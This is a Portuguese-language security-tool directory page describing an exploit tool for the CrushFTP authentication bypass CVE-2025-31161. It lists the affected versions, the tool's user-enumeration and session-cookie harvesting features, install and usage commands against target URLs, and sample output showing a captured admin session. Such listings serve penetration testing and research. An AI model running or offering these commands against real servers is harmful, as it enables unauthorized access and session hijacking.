Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-31161 — Ferramenta de Exploit CrushFTP CVE-2025-31161 🔓 | Kitploit
Ferramentas/GitHubGitHub/tx-one/cve-2025-31161
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoAutenticação
GitHubtx-one/cve-2025-31161

CVE-2025-31161

Ferramenta de Exploit CrushFTP CVE-2025-31161 🔓

Ver Repositório
2há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CrushFTP CVE-2025-31161 Ferramenta de Exploração 🔓

Ferramenta avançada de deteção e exploração para a vulnerabilidade CVE-2025-31161 em versões vulneráveis do CrushFTP.

CVE-2025-31161 é uma vulnerabilidade crítica de bypass de autenticação na Interface Web do CrushFTP. Ao manipular o cabeçalho HTTP Authorization, um atacante não autenticado pode obter acesso total sob qualquer nome de utilizador válido sem fornecer a palavra-passe correta.

Versões Afetadas

  • CrushFTP 9.3.8
  • CrushFTP 9.3.9
  • CrushFTP 9.3.10
  • CrushFTP 9.3.11
  • CrushFTP 9.3.12
  • Versões Enterprise do CrushFTP anteriores a 9.3.12.5

Funcionalidades Principais 🚀

  • Deteção automática da versão do CrushFTP e verificação de vulnerabilidade
  • Teste de credenciais multi-thread para enumeração rápida de utilizadores
  • Suporte a dois métodos de autenticação (Bearer Token & Basic Auth)
  • Geração de relatório JSON com cookies de sessão
  • Mecanismos inteligentes de repetição de conexão com configurações personalizadas
  • Saída colorida no terminal com registo detalhado
  • Cobertura de versões vulneráveis:
    • 9.3.8 a 9.3.12.5

Requisitos 📋

  • Python 3.8+
  • Pacotes necessários:
    root@kitploit:~
    pip install requests colorama urllib3
    

Instalação 🛠️

  1. Instalar dependências:
root@kitploit:~
 pip install requests colorama urllib3
  1. Clonar repositório:
root@kitploit:~
 git clone https://github.com/TX-One/CVE-2025-31161.git
 cd CVE-2025-31161
 python3 tx-crush.py -h

Utilização 🖥️

Comando Básico:

root@kitploit:~
python3 CVE-2025-31161.py -t https://target:8080 -u users.txt -o results.json

Opções:

root@kitploit:~
-h, --help            mostra esta mensagem de ajuda e sai
  -t, --target TARGET   URL do alvo (ex.: https://example.com:8080)
  -u, --users USERS     Ficheiro com lista de nomes de utilizador
  -o, --output OUTPUT   Ficheiro JSON de saída
  -T, --threads THREADS
                        Número de threads (padrão: 5)
  --no-ssl              Desativar verificação SSL
  --timeout TIMEOUT     Timeout do pedido (padrão: 15)
  --retries RETRIES     Número de tentativas (padrão: 3)
  --force               Ignorar verificação de versão

Exemplo Avançado:

root@kitploit:~
python3 exploit.py
  -t https://vulnerable-server.com:8000
  -u ./wordlists/common_users.txt
  -o ./results/compromised.json
  -T 10
  --retries 5
  --timeout 20

Exemplo de Saída 📄

root@kitploit:~
[
  {
    "target": "https://victim:8080",
    "user": "admin",
    "success": true,
    "method": "Bearer",
    "cookies": {"sessionID": "a1b2c3..."},
    "server_version": "CrushFTP/9.3.12"
  }
]
root@kitploit:~
[
  {
        "target": "http://victim:8080",
        "user": "admin",
        "success": false
    }
]

Aviso: Este projeto destina-se apenas a fins educativos e de pesquisa em segurança. Utilização responsável é necessária.

Baixar ferramenta